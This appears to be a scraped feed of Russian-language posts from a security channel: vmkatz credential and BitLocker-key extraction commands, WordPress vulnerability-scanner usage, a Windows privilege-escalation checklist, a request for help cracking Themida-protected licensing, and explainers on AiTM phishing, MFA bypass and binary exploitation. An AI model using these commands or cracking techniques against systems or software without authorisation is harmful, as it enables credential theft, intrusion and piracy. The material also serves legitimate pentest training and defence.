./vmkatz --bitlocker-fvek /tmp/keys snapshot.vmsn

4️⃣Рекурсивное сканирование всех виртуальных машин по пути /vmfs/volumes/datastore1/.

./vmkatz -r /vmfs/volumes/datastore1/

#tools #credentials #vmware

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

SeImpersonatePrivilege — и ты уже на полпути к SYSTEM

Получил reverse shell от доменного юзера. whoami /priv — стандартный набор, ничего интересного. Что дальше?

🎯 Порядок приоритетов при LPE:

1. Токен — SeImpersonatePrivilege у сервисных аккаунтов IIS/MSSQL открывает Potato-атаки прямо к SYSTEM
2. Сервисы — Unquoted Service Path встречается на каждом втором пентесте, а SERVICE_CHANGE_CONFIG для группы Users — прямой билет наверх
3. UAC bypass — десятки техник без GUI, когда застрял на medium integrity
4. Kernel exploits — последнее средство: объяснять заказчику BSOD на продакшне — сомнительное удовольствие

⚡ Если оба ключа AlwaysInstallElevated выставлены в `1` — любой MSI устанавливается от SYSTEM.

Полный разбор техник, команд и нюансов эксплуатации:

https://codeby.net/threads/povysheniye-privilegii-windows-ekspluatatsiya-miskonfiguratsii-tokenov-i-obkhod-uac-na-praktike.92759/

Читать полностью…

WPProbe: Инструмент для сканирования и оценки безопасности WordPress

WPProbe — это высокопроизводительный сканер безопасности с открытым исходным кодом, предназначенный для обнаружения установленных плагинов и тем WordPress, а также их сопоставления с известными уязвимостями из баз данных Wordfence и WPScan. Инструмент использует WordPress для скрытного обнаружения компонентов, что позволяет минимизировать риск блокировки со стороны систем безопасности. WPProbe разработан для использования специалистами по тестированию на проникновение, администраторами сайтов и исследователями безопасности.

🎇Основные функции
- Скрытное обнаружение через REST API (идентификация более 5000 плагинов без прямого перебора директорий)
- Три режима сканирования - Stealthy (по умолчанию), Bruteforce, Hybrid
- Поддержка сканирования нескольких целей одновременно
- Поддержка JSON и CSV для интеграции в конвейеры обработки
- Фильтрация по CVE, плагину, критичности и типу аутентификации
- Встроенный механизм обновления бинарного файла и базы данных

⬇️Установка

sudo apt  install wpprobe

Проверка

wpprobe -h

⏺️Для получения свежих данных непосредственно от Wordfence можно использовать бесплатный API-ключ

#с указанием ключа
wpprobe update-db --api-key ваш_wordfence_api_ключ

#или через переменную окружения
export WORDFENCE_API_KEY=ваш_ключ
wpprobe update-db

⏺️Базовое сканирование одного сайта

wpprobe scan -u https://example.com

⏺️Сканирование с указанием режима

#скрытный режим (по умолчанию)
wpprobe scan -u https://example.com --mode stealthy

#агрессивный режим (прямой перебор)
wpprobe scan -u https://example.com --mode bruteforce

#гибридный режим
wpprobe scan -u https://example.com --mode hybrid

⏺️Массовое сканирование из файла (файл targets.txt содержит по одному URL на строку)

wpprobe scan -f targets.txt -t 20

Параметр -t задает количество одновременных потоков для ускорения обработки

⏺️Сохранение результатов

#CSV формат
wpprobe scan -u https://example.com -o results.csv

#JSON формат
wpprobe scan -u https://example.com -o results.json

⏺️Поиск уязвимостей по CVE

wpprobe search --cve CVE-2024-1234

⏺️Быстрая проверка клиентского сайта перед обновлением

wpprobe update-db
wpprobe scan -u https://client-site.com -o scan_report.csv

⏺️Поиск критических уязвимостей для приоритетного исправления

wpprobe search --severity critical --details

⏺️Проверка нового плагина перед установкой

wpprobe search --plugin newly-acquired-plugin-name

🔎Ограничения и рекомендации
- Скрытный метод обнаружения требует, чтобы REST API WordPress был доступен. Некоторые плагины или настройки безопасности могут его отключать
- Если плагин установлен, но неактивен или скрыт системами безопасности, он может остаться незамеченным
- Для максимальной точности рекомендуется использовать API-ключи для получения свежих данных

#WordPress #PluginScanner #RESTAPI #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

Themida снята через unlicense — но динамический анализ не живёт.

ScyllaHide падает в Fatal Error 0x00005c, KsDumper молчит, TitanHide крашит процесс. Патч от третьих лиц через MinHook непонятным образом проходит проверку контрольной суммы импортов и переводит приложение с Dongle-проверки на сверку лицензии с файлом в папке. Алгоритм генерации этого файла — внутри. Но добраться до него не получается: защищённые .dll, замусоренный трейс после MinHook_Initialise_Hook, и приложение ещё и детектит VM.

🎯 Что уже стоит на столе у автора:
• Unlicense отработал, IAT и OEP восстановлены — есть unpacked_.exe для статики
• MinHook в чужом патче почему-то проходит CRC-проверку импортов/экспортов — и это само по себе вопрос
• Динамика умерла: 64dbg + ScyllaHide = Violation Access, чем больше опций включено, тем стабильнее краш
• Подозрение, что оригинальный алгоритм генерации затёрт, а рабочий спрятан в injected DLL — тоже под Themida

🔍 У человека конкретные три вопроса: как отличить hooked-функцию от динамически подгруженной из уже пропатченных библиотек, стоит ли дальше копать динамику через обход debugger detection, и как снимать защиту с .dll если она под VMProtect сверху. Если кто-то воевал с Themida на .dll или разбирался с injected MinHook-патчами без исходников — загляните, человек не новичок, но застрял на 4-й день.

https://codeby.net/threads/vopros-khuk-vytashchit-algoritm-generatsii-themida.92760/

Читать полностью…

MFA пройден — жертвой же и обойдён

Представь сценарий: пользователь вводит логин, пароль, жмёт «Подтвердить» в Authenticator — и искренне считает, что защищён. В этот момент атакующий уже импортирует его session cookie в свой браузер и читает его почту. Без брутфорса. Без перебора OTP. MFA прошла сама жертва — через прокси.

Это не теория и не CVE из бюллетеня. Это AiTM-фишинг (Adversary-in-the-Middle) — рабочая индустрия с подпиской от 100 до 1000 долларов в месяц за готовый кит.

🔢 Цифры, которые неудобно игнорировать

• По данным Sekoia, с января по апрель 2025-го в активной коммерческой эксплуатации крутилось 11 различных AiTM-китов
• Только за октябрь 2025 Microsoft Defender заблокировал более 13 миллионов писем одной кампании Tycoon 2FA
• К августу 2024-го практически 100% наблюдаемых кампаний мигрировали от классического credential harvesting к proxy-based перехвату
• По данным Obsidian Security, 84% скомпрометированных аккаунтов уже имели включённый MFA

🎯 Почему TOTP, push и SMS здесь не помогают

Классический Man-in-the-Middle работает на сетевом уровне — его нейтрализует TLS. AiTM работает на уровне приложения и специально заточен под обход MFA. TLS его не останавливает, потому что прокси сам является конечной точкой обоих соединений.

Жертва устанавливает TLS-соединение с сервером атакующего. Атакующий устанавливает своё TLS-соединение с легитимным IdP. Два отдельных зашифрованных канала. Жертва видит настоящую страницу Microsoft — не копию, а реальный контент через прокси. Вводит данные, проходит MFA-challenge. После успешной аутентификации IdP выдаёт session cookie — и атакующий перехватывает его до того, как он доберётся до браузера жертвы.

🛠 Три инструмента, которые делают это реальным

Evilginx3 — standalone-приложение на Go со встроенным DNS-сервером, автоматическими TLS-сертификатами и модульной конфигурацией через phishlets. Phishlet — YAML-файл, где прописано: какие поддомены проксировать, какие POST-параметры содержат credentials и какие cookie являются session tokens. Для M365 это обычно ESTSAUTH и ESTSAUTHPERSISTENT. Evilginx на лету переписывает все ссылки в HTML/JS-ответах, подставляя фишинговые поддомены вместо оригинальных.

Modlishka и Muraena — альтернативные прокси-фреймворки с похожей логикой, но разными подходами к конфигурации и обходу детекта. Все три реализуют одну идею: стать невидимым посредником между жертвой и легитимным сервисом.

🔵 Что работает на синей стороне

Ни TOTP, ни push, ни SMS не спасают — они все транзитом проходят через прокси. Реально помогают: FIDO2/passkeys (привязаны к домену, прокси не может подделать), Conditional Access с анализом аномалий сессии и мониторинг UserAgent — после импорта cookie браузер атакующего почти всегда отличается от браузера жертвы.

Полная механика атаки, конфигурация Evilginx и индикаторы детекта для каждого фреймворка — в статье. Читай, пока твои пользователи уверены, что MFA их защищает.

https://codeby.net/threads/aitm-fishing-obkhod-mfa-cherez-evilginx-modlishka-i-muraena.92741/

Читать полностью…

Митигации включены. Эксплойт всё равно проходит.

«Memory corruption мёртв, всё закрыли ASLR и DEP» — а на последнем CTF три из четырёх pwn-тасков решились через классику. Просто с поправкой на современность.

🎯 Четыре техники, которые работают в 2026-м:
• Stack canaries — не стена, а барьер. Обходятся через format string leak или брутфорсом в fork-сервере, где канарейка не меняется между дочерними процессами
• Tcache poisoning — glibc с 2.26 дал атакующим кэш с минимальными проверками. Safe-linking в 2.32+ снимается одной утечкой heap-адреса для восстановления XOR-ключа
• ROP и JOP — код-реюз обходит DEP. Intel CET закрыл ret через Shadow Stack — и тогда в ход идут jmp reg гаджеты с dispatcher-ом. Интерпретатор из обломков чужого кода
• ASLR leak — младшие 12 бит адреса не рандомизируются никогда. Один указатель раскрывает весь регион, отсюда универсальность двухэтапной схемы leak → chain

🔍 Для каждой техники — рабочий pwntools-код, сравнительная таблица митигаций (DEP / ASLR / canaries / CFI / CET) и пошаговый workflow от checksec до интерактивного шелла. В финале — открытый вопрос про heap leak на glibc 2.35+ с Full RELRO и PIE. Интересно, кто какой примитив предпочитает.

https://codeby.net/threads/ekspluatatsiya-binarnykh-uyazvimostei-stack-overflow-heap-exploitation-rop-jop-i-obkhod-sovremennykh-zashchit.92735/

Читать полностью…

MFA включена — значит всё в порядке? Не совсем

Двухфакторка защищает ровно один момент — сам вход. Как только система выдала session token, MFA больше не нужна. Кто владеет токеном — тот и в аккаунте.

🎯 Три вектора против MFA:

• SS7-перехват — SMS с OTP маршрутизируется через узел атакующего
• SIM-свопинг — номер переносится через звонок в поддержку, все коды идут злоумышленнику
• MFA fatigue — поток push-запросов, пока пользователь не нажмёт «Подтвердить» от усталости

По данным Obsidian Security, 97%+ атак на MFA-защищённые аккаунты в 2025 году начинались не со взлома криптографии, а с поиска зазоров вокруг неё.

🔍 В статье — маппинг на MITRE ATT&CK, разбор adversary-in-the-middle фишинг-прокси и рекомендации для blue team.

https://codeby.net/threads/obkhod-mnogofaktornoi-autentifikatsii-ataki-cherez-otp-perekhvat-sim-svoping-i-push-ustalost.92728/

Читать полностью…

Прочитал 10 статей про SQL-инъекции, но не можешь перехватить первый HTTP-запрос?

Это классическая ловушка новичка: теория без практики не работает. Пентест начинается не с изучения уязвимостей, а с рабочего окружения, где можно безопасно ломать.

🐳 Один Docker-контейнер решает проблему легальной цели:
docker run --rm -it -p 80:80 vulnerables/web-dvwa
Внутри DVWA — весь OWASP Top 10 с тремя уровнями сложности. Сломал конфиг — пересоздал за секунды.

🔍 Дальше — Burp Suite как прокси между браузером и приложением. Каждый запрос можно перехватить, изменить и отправить заново. Именно здесь новички впервые видят, что происходит «под капотом» формы логина.

По данным HackerOne, Burp используют большинство багхантеров — не потому что модно, а потому что это фундамент ручного тестирования.

Полный разбор — от запуска окружения до первой найденной уязвимости руками:

https://codeby.net/threads/veb-pentest-dlya-nachinayushchikh-ot-nastroiki-okruzheniya-do-pervoi-naidennoi-uyazvimosti.92714/

Читать полностью…